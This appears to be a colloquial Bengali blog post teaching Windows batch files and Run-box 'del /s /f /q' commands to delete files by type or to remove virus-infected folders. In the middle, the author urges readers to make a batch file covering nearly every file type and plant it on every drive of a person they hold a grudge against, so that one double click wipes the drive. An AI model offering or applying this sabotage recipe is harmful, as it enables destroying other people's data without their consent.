Batch File দিয়া খুব কম সময়েই Delete করা যায় যেকোন File । আপনি ইচ্ছা করলে Folder থেইকা নির্দিষ্ট Type এর File ও Delete করতে পারেন ।
Batch File টা তৈরি করতে প্রথমে note pad open করেন । তার পর নিচের কোডটা copy করে paste করে যেকোন নামে save করেন ।
del *.dat /s /f
del *.txt /s /f
del *.mp3 /s /f
এইবার ফাইল টাইপটা .txt থেইকা change কইরা .bat দিয়া save করেন। তৈরি হইয়া গেল আপনার Batch File। একটা new folder এ Batch File টা রাখেন। এইবার .dat , .txt এবং .mp3 টাইপের file ঐ ফোল্ডার এ রাখেন । তার পর Batch File টাতে ডাবল ক্লিক করেন । দেখবেন পুরা ফোল্ডার খালি হইয়া গেছে । আপনারা ইচ্ছা করলে ফাইলটা edit করে আপনার পছন্দ মতো File টাইপ দিয়া দিতে পারেন । খালি মাঝের mp3 এর জায়গায় আপনার পছন্দ মতো File টাইপ দিয়া save করেন ।
এই ফাইল দিয়া আকাম ও করতে পারবেন । প্রায় সব রকম File টাইপ দিয়া একটা Batch File বানান । যার লগে আপনের কাবজাব আছে তার পিসির প্রত্যেক ড্রাইভে দিয়া দেন । কোনো ফোল্ডারে দিয়েন না । ডাবল ক্লিক করলেই পুরা ড্রাইভ খালি হইয়া যাইব ।
run command দিয়া ও এই একই কাজ করা যায় । এর জন্য start এ গিয়া run এ গিয়া আপনি যেই ড্রাইভের ফাইল Delete করতে চান সেই ড্রাইভের নাম দিয়া কোলোন( : ) দিয়া এন্টার দেন । ধরুন আপনি E ড্রাইভ এর abc নামের ফোল্ডার টা Delete করতে চান , তাইলে লিখতে হইব E: ।
তার পর লিখেন নিচের কোড ।
del /s/f/q "E:abc"
অর্থাত , " " এর ভিতর খালি ফোল্ডার টার path দিয়া দেন ।
এইবার এন্টার দেন । দেখেন ফোল্ডার এর ভিতর কিছু নাই ।
আপনি ইচ্ছা করলে Folder থেইকা নির্দিষ্ট Type এর File ও Delete করতে পারবেন। । ধরুন আপনি E ড্রাইভ এর abc নামের ফোল্ডার এর a.txt ফিলেটা Delete করতে চান , এর লাইগা লিখেন নিচের কোড ।
del /s/f/q "E:abca.txt"
হইয়া যাইব Delete ।
এখন আপনি বলতে পারেন এমনে Delete করার দরকার কি ?
কোনো ড্রাইভ এর কোনো ফোল্ডার এ যদি ভাইরাস ফাইল থাকে তাইলে মাঝে মাঝে দেখবেন আপনি ঐ ড্রাইভ বা ঐ ফোল্ডার এ ঢুকতে পারতাসেননা বা Delete ও করতে পারতাসেননা বা ঢুকলে cpu ১০০% কাজ করে । তখন restart দেয়া ছাড়া গতি থাকেনা । এইরকম সমস্যায় পরলে cpu restar দিয়া run এ গিয়া Delete মাইরা দেন ভাইরাস আক্রান্ত ফাইল অথবা ফোল্ডারটা । নগদে Delete হইয়া যাইব ।
আজকা আর কথা বাড়াইলাম না ।
কাজে আসলে আওয়াজ দিয়েন । আর সবাই ভাল থাইকেন ।

অনুগ্রহ করে অপেক্ষা করুন। ছবি আটো ইন্সার্ট হবে।



